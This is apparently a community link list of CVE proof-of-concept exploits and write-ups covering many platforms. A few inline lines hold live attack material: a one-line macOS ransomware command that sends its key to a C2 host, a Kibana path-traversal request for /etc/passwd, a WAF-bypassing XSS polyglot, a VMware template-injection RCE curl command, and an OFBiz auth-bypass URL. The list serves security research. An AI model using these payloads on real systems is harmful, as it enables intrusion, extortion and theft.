Some CVE PoC repos on GitHub or elsewhere on the internet.
- First, see: Awesome CVE PoC by qazbnm456.
- To search (without PoCs): cve-search; you can use it offline too.
- This is a nice wrapper: vFeed.
- Automated Generation of Proofs of Vulnerability with S2E
- SecurityExploits: This repository contains proof-of-concept exploits developed by the Semmle Security Research Team. We always disclose security vulnerabilities responsibly, so this repository only contains exploits for vulnerabilities which have already been fixed and publicly disclosed.
- Penetration_Testing_POC: About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms.
- How to register a CVE
- ALPACA Attack
- Overview: OWASP Top 10 2021
- CVE Trends: So I built CVE Trends; it collates real-time information about tweeted CVEs.
- Spectre: CVE-2017-5753, CVE-2017-5715
- Dirty Cow: CVE-2016-5195 Others
- "Root" via dirtyc0w privilege escalation exploit
- Huge Dirty Cow: CVE-2017-1000405
- SMEP, SMAP and Chrome Sandbox: CVE-2017-5123
- SambaCry: CVE-2017-7494
- The Stack Clash: CVE-2017-1000364
- GoAhead web server: CVE-2017-17562
- New bypass and protection techniques for ASLR on Linux
- Linux ASLR integer overflow: Reducing stack entropy by four: CVE-2015-1593
- Ubuntu CVEs: CVE-2017-16995, netfilter, CVE-2013-1763
- Linux Kernel Version 4.14 - 4.4 (Ubuntu && Debian): CVE-2017-16995
- Meltdown/Spectre: Understanding Spectre and Meltdown Vulnerability
- Linux Kernel TCP implementation vulnerable to Denial of Service: CVE-2018-5390
- Linux Kernel Vulnerability Can Lead to Privilege Escalation: Analyzing CVE-2017-1000112. repo: kernel-exploits: A bunch of proof-of-concept exploits for the Linux kernel.
- Malicious Command Execution via bash-completion: CVE-2018-7738
- An integer overflow flaw was found in the Linux kernel's create_elf_tables() function: CVE-2018-14634
- This repo records all the vulnerabilities of Linux software I have reproduced in my local workspace
- linux-kernel-exploitation: A bunch of links related to Linux kernel exploitation
- Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration
- System Down: A systemd-journald exploit. Combined Exploitation of CVE-2018-16865 and CVE-2018-16866
- mario_baslr: PoC for breaking hypervisor ASLR using branch target buffer collisions.
- waitid: CVE-2017-5123
- sudo: CVE-2019-14287 - Sudo Bug Allows Restricted Users to Run Commands as Root. redhat, PoC
- Memory corruption in net/packet/af_packet.c: CVE-2020-14386, poc
- BlindSide
- Exploiting a Linux kernel vulnerability in the V4L2 subsystem: CVE-2019-18683
- Heap-Based Buffer Overflow in Sudo: CVE-2021-3156
- Ubuntu OverlayFS Local Privesc: CVE-2021-3493
- A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer: cve-2021-33909-crasher.c cve-2021-33910-crasher.c
- Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug
- Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution: CVE-2021-43267
- PoC for CVE-2021-4034: blasty-vs-pkexec.c
- Linux Kernel Exploit with mqueue: CVE-2022-32250.
- Bringing back the stack attack: CVE-2022-42703 Prefetch Side-Channel Attacks
- Linux kernel stack buffer overflow in nftables: CVE-2023-0179
- Unauthenticated remote DOS in ksmbd NTLMv2 authentication
- Kernel Level Privilege Escalation in Oracle Solaris: CVE-2018-2892
- Office: CVE-2017-0199
- WebDAV: CVE-2017-11882
- WSDL Parser: CVE-2017-8759
- MS .NET: CVE-2017-8759
- WPAD/PAC: aPAColypse now
- Meltdown/Spectre: CVE-2017-5754, CVE-2017-5715
- Packager OLE: CVE-2018-0802
- Integer Overflow: Integer Overflow
- Hardcore corruption of my execve() vulnerability in WSL: CVE-2018-0743
- Privilege Escalation Vulnerability in Windows Standard Collector Service: CVE-2018-0952
- Exploit Published for Windows Task Scheduler Zero-Day. poc
- PowerPool malware exploits ALPC LPE zero-day vulnerability
- You can't contain me! :: Analyzing and Exploiting an Elevation of Privilege Vulnerability in Docker for Windows: CVE-2018-15514
- Invoke-WMILM: This is a PoC script for various methods to achieve authenticated remote code execution via WMI, without (at least directly) using the Win32_Process class. The type of technique is determined by the "Type" parameter.
- Use-after-free (UAF) vulnerability: CVE-2018-8373
- Microsoft Edge RCE: CVE-2018-8495
- Device Guard/CLM bypass using MSFT_ScriptResource: CVE-2018-8212
- A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
- windows-kernel-exploits: windows-kernel-exploits, a collection of Windows platform privilege escalation vulnerabilities
- docx-embeddedhtml-injection: This PowerShell script exploits a known vulnerability in Word 2016 documents with embedded online videos by injecting HTML code into a docx file, replacing the values of all pre-existing embeddedHtml tags.
- Root Cause of the Kernel Privilege Escalation Vulnerabilities: CVE-2019-0808
- DACL Permissions Overwrite Privilege Escalation: CVE-2019-0841
- Scanner PoC for RDP RCE vuln: CVE-2019-0708
- Exploiting the Windows Task Scheduler Through: CVE-2019-1069
- cve-2019-0708-scan
- More Than a Penetration Test: CVE-2019-1082.
- Out-Of-Bounds Read\Write: CVE-2019-1164
- Bluekeep: CVE-2019-0708
- Full exploit chain against Firefox on Windows 64-bit: CVE-2019-11708 & CVE-2019-9810
- CVE-2020-0601: the ChainOfFools/CurveBall attack explained with PoC
- Chainoffools: A PoC for CVE-2020-0601
- CurveBall: PoC for CVE-2020-0601
- Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate
- Glueball, CVE-2020-1464: Interesting tactic by Ratty & Adwind for distribution of JAR appended to signed MSI – CVE-2020-1464, GlueBall: The story of CVE-2020-1464
- Analysis of Recently Fixed IE Zero-Day: CVE-2020-1380
- Microsoft-Word-Use-After-Free - Word Docx with exploit.
- Half Life 1 - Buffer overflow In hl.exe's launch -game argument allows an attacker to execute arbitrary code locally or from browser
- PoC for enabling wdigest to bypass credential guard
- Zerologon exploit test tool for CVE-2020-1472: paper, PoC exploit. Other tools: ze0Dump, SharpZeroLogon - From Lares Labs: Defensive Guidance for ZeroLogon, another exploit, A different way of abusing Zerologon (CVE-2020-1472), ZeroLogon detected by Microsoft Defender for Identity, Invoke-ZeroLogon
- CobaltStrike-BOF: Collection of beacon BOF written to learn windows and cobaltstrike
- Kerberos Bronze Bit Attack – Practical Exploitation: CVE-2020-17049
- Windows SMB Information Disclosure Analysis: CVE-2020-17140
- BitLocker Lockscreen bypass: CVE-2020-1398
- Local Privilege Escalation vulnerability found in Dell SupportAssist: CVE-2021-21518 article
- ProxyLogon: CVE-2021-26855 another
- Zero-day vulnerability in Desktop Window Manager: CVE-2021-28310
- Windows kernel zero-day exploit: CVE-2021-1732
- Windows TCP/IP: CVE-2021-24086, PoC another write-up: Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
- Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol, CVE-2020-1113 and CVE-2021-1678. RemotePotato0
- Microsoft Exchange Server Remote Code Execution Vulnerability: CVE-2021-28482 article
- Searching for Deserialization Protection Bypasses in Microsoft Exchange: CVE-2022-21969
- A guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys: CVE-2021-28476
- PrintNightmare:
- C# and Impacket implementation of PrintNightmare: CVE-2021-1675 / CVE-2021-34527.
- Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare): CVE-2021-1675 - PrintNightmare LPE (PowerShell)
- Local Privilege Escalation Edition of: CVE-2021-1675/CVE-2021-34527.
- SpoolSploit: A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.
- current understanding of the #PrintNightmare exploitability flowchart
- Summer of SAM: CVE-2021-36934
- PoC tool to coerce Windows hosts to authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well: SpoolSample, SpoolerScanner
- Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function.
- Concealed Position: Bring your own print driver privilege escalation tool.
- This Internet Explorer MSHTML remote code execution vulnerability: CVE-2021-40444 CVE-2021-40444 PoC
- ZDI-21-1053: Bypassing Windows Lock Screen
- aad-sso-enum-brute-spray: POC of SecureWorks' recent Azure Active Directory password brute-forcing vuln
- No PoC, but almost: #windows11 Defender bypass (worked for #meterpreter) (build 22000)
- Windows Kernel Information Disclosure POC: CVE-2021-31955
- HTTP Protocol Stack Remote Code Execution Vulnerability: CVE-2021-31166 yara
- Windows User Profile Service 0day LPE: CVE-2021-34484 tweet
- Some notes about Microsoft Exchange Deserialization RCE: CVE-2021-42321
- RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
- Pachine: CVE-2021-42278 - Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)
- CallbackHell: Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE). chinese: CVE-2021-40449
- CVE-2021-42287/CVE-2021-42278 Weaponisation Exploit samAccountName spoofing with Kerberos
- noPac: CVE-2021-42287/CVE-2021-42278 - Scanner & Exploiter.
- An unpatched information disclosure in Microsoft Windows CVE-2021-24084
- http.sys CVE-2022-21907
- Group Policy Folder Redirection: CVE-2021-26887
- Uninitialized pointer free in RMSRoamingSecurity Remote Code Execution: CVE-2022-21974, other
- Sysmon: CVE-2023-29343
- Proxy-Attackchain: proxylogon & proxyshell & proxyoracle & proxytoken & all exchange server vulns summarization :)
- Escaping the sandbox by misleading bluetoothd: CVE-2018-4087
- MS Office 2016 for Mac Privilege Escalation via a Legacy Package: CVE-2018-8412
- blanket: Mach port replacement vulnerability in launchd on iOS 11.2.6 leading to sandbox escape, privilege escalation, and codesigning bypass (CVE-2018-4280)
- brokentooth: POC for CVE-2018-4327
- Kernel RCE caused by buffer overflow in Apple's ICMP packet-handling code: CVE-2018-4407
- Offensive testing to make Dropbox (and the world) a safer place
- WebKit-RegEx-Exploit: Safari 12.1.1
- Chaos iOS: < 12.1.2 PoC by @S0rryMyBad, transcribed since he posted it as a photo rather than as source code. Also cleaned up.
- powerd exploit: Sandbox escape to root for Apple iOS < 12.2 on A11 devices
- iMessage: The Many Possibilities of CVE-2019-8646 poc
- PoC tool for setting nonce without triggering KPP/KTRR/PAC (requires tfp0)
- xnu local privilege escalation via OS X 10.10.5 kernel local privilege escalation
- MacOS Ransomware in one tweet:
sh -c 'p=$(head -n 1024 /dev/urandom | strings| grep -o "[[:alnum:]]" | head -n 64| tr -d "\n"); diskutil apfs addVolume disk1 APFS x -passphrase "$p"; rsync -zvh --remove-source-files ~/exfil/* /Volumes/x; diskutil umount x; curl -0 http://C2/"$p"'
- Don't Share Your $HOME with Untrusted Guests. PoC: This proof-of-concept demonstrates a trivial no-bug, by-design virtual machine guest-to-host escape with full arbitrary code execution on the current version of Parallels Desktop for Mac.
- WebContent->EL1 LPE: OOBR in AppleCLCD / IOMobileFrameBuffer: CVE-2021-30807
- Please Stop Naming Vulnerabilities: Exploring 6 Previously Unknown Remote Kernel Bugs Affecting Android Phones
- qu1ckr00t: Tailoring CVE-2019-2215 to Achieve Root.
- s8_2019_2215_poc: PoC 2019-2215 exploit for S8/S8 active with DAC + SELinux + Knox/RKP bypass.
- Universal XSS in Android WebView: CVE-2020-6506
- Exploiting a Single Instruction Race Condition in Binder: CVE-2020-0423
- Spring Data Commons: CVE-2018-1273
- Log4Shell Shitshow:
- Log4j 2 Vulnerability Analysis: CVE-2021-44228
- log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228.
- Log4j-RCE-Scanner: Log4j-RCE-Scanner - Remote command execution vulnerability scanner for Log4j.
- CVE-2021-44228-Log4Shell-Hashes
- Apache Log4j RCE Attempts
- CVE-2021-44228-PoC-log4j-bypass-words: CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches.
- Log4shell vulnerabilities: CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, CVE-2021-45105: Operational information regarding the log4shell vulnerabilities in the Log4j logging library.
- Log4j Vulnerability Tester: This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.
- Log4Shell-IOCs: A collection of intelligence about Log4Shell and its exploitation activity.
- Log4Shell MindMaps, repo
- JNDI-Exploit-Kit: A modified version of the great JNDI-Injection-Exploit created by @welk1n. This tool can be used to start an HTTP Server, RMI Server and LDAP Server to exploit java web apps vulnerable to JNDI Injection)
- log4j Linux IoC Detector: A Simple Log4j Indicator of Compromise Linux Detector
- Huntress Log4Shell Testing Application
- nse-log4shell: Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
- LOG4J Java exploit - A trick to bypass words blocking patches
- Searchable page for CISA Log4j (CVE-2021-44228) Affected Vendor & Software List link
- How to find 5 RCEs in Apache Struts with Semmle QL: CVE-2018-11776
- Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts: CVE-2018-11776, docker Poc, other poc
- Apache Struts Vulnerability POC Code Found on GitHub
- struts-pwn: An exploit for Apache Struts CVE-2018-11776
- fragattack: This website presents FragAttacks (fragmentation and aggregation attacks) which is a collection of new security vulnerabilities that affect Wi-Fi devices.
- Spectre: CVE-2017-5753,CVE-2017-5715
- Meltdown: CVE-2017-5754
- Cyberus: Meltdown
- L1 Terminal Fault: CVE-2018-3615/CVE-2018-3620/CVE-2018-3646/INTEL-SA-00161
- TPM-Fail: TPM meets Timing and Lattice Attacks. TPM-FAIL vulnerabilities impact TPM chips in desktops, laptops, servers, github.
- Hundreds Of Millions Of Dell Computers At Risk Due to Multiple BIOS Driver Privilege Escalation Flaws: CVE-2021-21551
- Reverse Engineering & Exploiting Dell CVE-2021-21551
- Know Your Enemy: Exploiting the Dell BIOS Driver Vulnerability to Defend Against It: CVE-2021-21551
- ARM exploitation for IoT – Episode 3
- Multiple vulnerabilities found in Wireless IP Camera: CVE-2017-8224, CVE-2017-8222, CVE-2017-8225, CVE-2017-8223, CVE-2017-8221
- DoubleDoor, IoT Botnet bypasses firewall as well as modem security using two backdoor exploits: CVE-2015-7755 and CVE-2016-10401
- i.MX7 M4 Atomic Cache Bug
- MikroTik Firewall & NAT Bypass
- Security probe of Qualcomm MSM data services CVE-2020-11292 news
- HPE iLO4: CVE-2017-12542
- From Compiler Optimization to Code Execution - VirtualBox VM Escape: CVE-2018-2844. poc
- VirtualBox 3D PoCs & exploits
- Multiple Vulnerabilities on Kerui Endoscope Camera
- virtualbox_e1000_0day: VirtualBox E1000 Guest-to-Host Escape
- PHPMailer: CVE-2016-10033
- PHP PrestaShop 1.6.x Privilege Escalation: CVE-2018-13784
- phpLdapAdmin multiple vulns: phpldapadmin remote exploit and vulnerable container.
- imagecolormatch() OOB Heap Write exploit: CVE-2019-6977
- vBulletin: 2019_vbulletin_0day_info.txt
- PHP 7.0-7.4 disable_functions bypass
- XML-RPC-Library-1.3.0-Remote-PHP-Code-Execution-Exploit
- xmlrpc-bruteforcer: Multi-threaded XMLRPC brute forcer using amplification attacks targeting WordPress installations prior to version 4.4.
- CutePHP Cute News 2.1.2 RCE PoC: CVE-2019-11447
- Tenable: a lot of proofs of concept
- misc PoC - Internet of (In)Security Things:
- Dahua Console, access internal debug console and/or other researched functions in Dahua devices. Feel free to contribute in this project.
- Geovision Inc. IP Camera, with a lot others in this repo
- Disclosures by DrunkenShells
- Apache Tomcat: CVE-2017-12617
- Palo Alto Networks firewalls: Palo Alto Networks firewalls remote root code execution CVE-2017-15944
- https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/ and A fully implemented kernel exploit for the PS4 on 4.05FW
- HOW TO HACK A TURNED-OFF COMPUTER, OR RUNNING UNSIGNED CODE IN INTEL ME (CVE-2017-5705, CVE-2017-5706, CVE-2017-5707), github
- Nintendo Switch JailBreak PoC: CVE-2016-4657
- Play with FILE Structure - Yet Another Binary Exploit Technique
- Zero-day vulnerability in Telegram
- A Telegram bug that discloses the phone numbers of any users in public groups
- Bug or Backdoor: Exploiting a Remote Code Execution in ISPConfig by 0x09AL Security blog.
- SSH Exploit written in Python for CVE-2018-15473 with threading and export formats: CVE-2018-15473, analysis
- RICOH MP 2001 Printer Cross Site Scripting (Packet Storm), code, Cross-Site Scripting
- Oracle WebLogic WLS-WSAT Remote Code Execution Exploit: CVE-2017-10271
- Oracle BI, Out of Band XXE Injection Via gopher: CVE-2016-3473
- WebLogic Exploit: CVE-2017-10271
- Weblogic RCE by only one GET request: CVE-2020-14882 Analysis
- Talos Vulnerability Deep Dive: Sophos HitmanPro.Alert vulnerability - CVE-2018-3971
- JPEG [JAY-peg]: some JPEG PoCs
- Kubernetes: CVE-2018-1002105
- QEMU: vga: OOB read access during display update: CVE-2017-13672
- QEMU VM Escape: CVE-2019-14378
- Exploiting LaTeX with CVE-2018-17407
- GitHub Desktop RCE (OSX), H1-702 2018, poc
- unprivileged users with UID > INT_MAX can successfully execute any systemctl command (#74)
- GitLab CE/EE, affecting all versions starting from 11.9: CVE-2021-22205
- Authenticated RCE in Polycom Trio 8800, pt.1
- Tenable Research Advisory: Zoom Unauthorized Command Execution - CVE-2018-15715
- Crash Chrome 70 with the SQLite Magellan bug code
- From vulnerability report to a crafted packet using instrumentation: CVE-2018-4013
- PoC for Foxit Reader: CVE-2018-14442
- Social Network Tabs Wordpress Plugin Vulnerability: CVE-2018-20555
- 700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin
- ES File Explorer Open Port Vulnerability: CVE-2019-6447
- Atlassian Jira vulnerable: CVE-2017-9506
- Chrome:
- CVE-2019-5782
- CVE-2019-5786: FileReader Exploit
- CVE-2019-13054: The page utilizes the new WebHID API to extract AES encryption keys from vulnerable dongles. PoC Page
- chrome 0day r4j0x00
- ELECTRIC CHROME: CVE-2020-6418 on Tesla Model 3.
- Analysis of Chromium issue 1196683, 1195777
- Google Books X-Hacking
- Ruby on Rails: File Content Disclosure on Rails - CVE-2019-5418
- Libreoffice - Remote Code Execution via Macro/Event execution: CVE-2018-16858
- Signal IDN homograph attack: CVE-2019-9970.
- Grandstream Exploits: Grandstream Exploits
- Apache HTTPD Root Privilege Escalation - CARPE (DIEM): CVE-2019-0211, github
- Apache <= 2.4.48 - Mod_Proxy SSRF: CVE-2021-40438
- Say Cheese: Ransomware-ing a DSLR Camera
- echo H4sICH0mqFkAA3BvYwDbweS/W8LxrMCuK8wbZN85bWh494VhFIwUELoKAIJvFIwAAgAA | base64 -d | gunzip > a && qemu-system-i386 -vga cirrus a
- Elasticsearch Kibana Console CVE-2018-17246 PoC:
GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
- Web/JavaScript/WAF payload that will run in a lot of contexts: short but lethal. No script tags, thus bypassing a lot of WAFs, and it executes in multiple environments.
javascript:"/*'/*`/*--><html \" onmouseover=/*<svg/*/onload=alert()//>
- Thrangrycat
- Responding to Firefox 0-days in the wild
- Bitbucket 6.1.1 Path Traversal to RCE: CVE-2019-3397
- ThinVNC Client Authentication Bypass: CVE-2019-17662 - with PoC
- metasploit http DoS module: CVE-2019-5645
- PandoraFMS v7.0NG authenticated Remote Code Execution: CVE-2019-20224
- First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group
- Mikrotik Winbox: CVE-2018-14847 metasploit 45578
- MkCheck: Script to check MikroTik Routers the WinBox Authentication Bypass Disclosure & RouterOS Jailbreak vulnerabilities
- Jenkins Security Advisory 2020-08-17/CVE-2019-17638: Operation on a Resource after Expiration or Release in Jetty Server on hacker news
- Some PoCs about: CVE-2020-8207 and CVE-2020-8324.
- Richsploit: One tool to exploit all versions of RichFaces ever released CVE-2018-14667
- Forget Your Perimeter - RCE in Pulse Connect Secure: CVE-2020-8218.
- Pulse Connect Secure Samba buffer overflow: CVE-2021-22908
- Some Starlabs CVEs:
- The Route to Root: Container Escape Using Kernel Exploitation
- cve-scanner-exploiting-pocs: Collection of ideas and specific exploits against Docker CVE scanners
- Docker Escape Tool: Tool to test if you're in a Docker container and attempt simple breakouts
- AT-TFTP_Long_Filename: Exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.
- The Anatomy of a Bug Door: Dissecting Two D-Link Router Authentication Bypasses, CVEs CVE-2020-8863 and CVE-2020-8864. dsp-w215-hnap: Tool for reading data from D-Link DSP-W215 Smart Plug
- An Exercise in Practical Container Escapology
- VMware vCenter 6.5u1
- The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server: CVE-2021-21985
- VMware vCenter Server: CVE-2021-21985
- Exploit for VMware Workspace ONE Access: CVE-2022-22954
curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
- VMWare vRealize Network Insight Pre-Authenticated RCE: CVE-2023-20887
- Unauthenticated Full-Read SSRF in Grafana: CVE-2020-13379
- Cisco Security Manager PoCs
- UK NCSC’s alert urges orgs to fix MobileIron: CVE-2020-15505
- CSM_Pocs: Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. CSM_pocs.
- Fortiscan (CVE-2018-13379): A high performance FortiGate SSL-VPN vulnerability scanning and exploitation tool.
- FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests: CVE-2018-13379: This module massively scans for and exploits a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests (CVE-2018-13379).
- FortiWeb CVE
- Use-After-Free IE Vulnerability: CVE-2020-17053
- Cisco ASA: CVE-2020-3452
- github cli: CVE-2020-26233
- ECOSPLOITS: Bunch of exploits for eCOS.
- Advisory X41-2021-002: nginx DNS Resolver Off-by-One Heap Write Vulnerability: CVE-2021-23017
- F5 BIG-IQ: CVE-2021-22986
- Pulse Connect Secure: CVE-2021-22937
- Dahua cameras: CVE-2021-33044 and CVE-2021-33045
- Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code Exploit “CONTENT-TYPE CONFUSION” – UNSAFE CODE EXECUTION
- Zoom RCE from Pwn2Own 2021
- GHSL-2021-102: ReDoS (Regular Expression Denial of Service) in Fluentd - CVE-2021-41186
- WSO2 RCE exploit and writeup: CVE-2022-29464
- Barracuda Email Security Gateway Appliance (ESG) Vulnerability
- SonicWall Discovers Critical Apache OFBiz Zero-day - AuthBiz: CVE-2023-51467, poc, poc code:
/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y
Please, send pull requests for new additions.
Thanks!